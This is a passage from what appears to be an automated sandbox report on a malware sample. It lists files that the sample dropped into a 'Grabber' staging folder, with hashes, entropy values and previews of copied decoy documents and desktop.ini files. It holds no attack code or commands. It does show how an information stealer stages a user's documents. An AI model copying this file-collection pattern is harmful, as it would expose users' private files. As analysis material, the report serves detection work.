                                                            Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW\JDDHMPCDUJ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW\KLIZUSIQEN.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696703751818505
                                                            Encrypted:false
                                                            SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                            MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                            SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                            SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                            SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                            Malicious:false
                                                            Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW\ZGGKNSUKOP.xlsx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\EIVQSAOTAQ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692990330209164
                                                            Encrypted:false
                                                            SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                            MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                            SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                            SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                            SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                            Malicious:false
                                                            Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\EWZCVGNOWT.pdf

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690071120548773
                                                            Encrypted:false
                                                            SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                            MD5:8F49644C9029260CF4D4802C90BA5CED
                                                            SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                            SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                            SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                            Malicious:false
                                                            Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\JDDHMPCDUJ.png

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\KLIZUSIQEN.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696703751818505
                                                            Encrypted:false
                                                            SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                            MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                            SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                            SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                            SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                            Malicious:false
                                                            Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):3.5258560106596737
                                                            Encrypted:false
                                                            SSDEEP:12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
                                                            MD5:06E8F7E6DDD666DBD323F7D9210F91AE
                                                            SHA1:883AE527EE83ED9346CD82C33DFC0EB97298DC14
                                                            SHA-256:8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
                                                            SHA-512:F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):190
                                                            Entropy (8bit):3.5497401529130053
                                                            Encrypted:false
                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                            MD5:D48FCE44E0F298E5DB52FD5894502727
                                                            SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                            SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                            SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                            Malicious:false
                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                            C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
